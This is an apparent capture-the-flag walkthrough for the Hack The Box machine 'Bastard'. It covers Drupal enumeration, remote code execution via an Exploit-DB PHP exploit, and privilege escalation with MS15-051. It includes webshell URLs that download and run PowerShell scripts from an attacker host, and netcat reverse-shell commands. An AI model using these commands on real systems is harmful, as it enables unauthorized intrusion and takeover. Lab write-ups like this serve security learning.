Hack The Box: Bastard




Difficulty: Medium Machine Creator: ch4p Tools Used:

NMAP Droopescan Searchsploit PHP Burp Suite Remote Code Execution Powershell Empire: Powerup.ps1 Sherlock Netcat

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.9

HTTP – Drupal


Droopescan

For Drupal we can use a tool called droopescan. We can install using python pip installer.

Apt-get install python-pip pip install droopsescan

Now we can run droopescan against the remote server. This will take a while to finish.

droopescan scan drupal -u http://10.10.10.9

Searchsploit

We know this is a drupal7 server lets use searchsploit to see if there are any vulnerabilities that we may be able to use.

searchsploit drupal

Lets copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

We need to manually edit this exploit which is written in PHP. First install php-curl

apt-get install php-curl



Burp Suite

Let’s setup port forwarding. We will direct everything pointing to localhost:1337 to 10.10.10.9:80


Now setup the request handling.



Now we need to update our exploit to route through the proxy.







Exploit Execution



Remote Code Execution



Powershell Empire

We can find vulnerabilities using powerup from powershell empire. Let’s download Powershell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have PSE downloaded lets copy the PowerUp.ps1 so we can edit it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .


Now we need to pull the PowerUp.ps1 from our web server and execute on the remote machine.

In the webshell we can add this command.

http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/PowerUp.ps1’) | powershell -noprofile –


Looking at the results we can see access denied which tells us that we don’t have admin rights.

Going through the results there is nothing that can help us elevate our permissions.

Sherlock

Let’s try finding a vulnerability using sherlock.ps1

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

We can copy and execute sherlock the same way that we did powerup.

10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.11:8000/Sherlock.ps1’) | powershell -noprofile –

Reverse Shell Netcat

Before we do our privledge elevation we need a remote shell we can do this with netcat x64 verison.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Setup our netcat listener.

nc -lvnp 8081

Make sure the python simplehttp server is running

Python -m SimpleHTTPserver

Enter the follow url in the browser to upload netcat x64 and create a reverse shell.

http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081


Privledge Eseclation


https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051


MS15-051 exploit

10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe whoami

Privledge Netcat

Similiar to the previous netcat we did were going to execute the existing nc file and create a 2nd reverse shell running as system.

nc -lvnp 8082

10.10.10.9/exploit.php?fupload=ms15-051×64.exe&fexec=ms15-051×64.exe “nc -e 10.10.14.11 8082”

User.txt and Root.txt





#Drupal #hackthebox #RCE #RemoteCodeExecution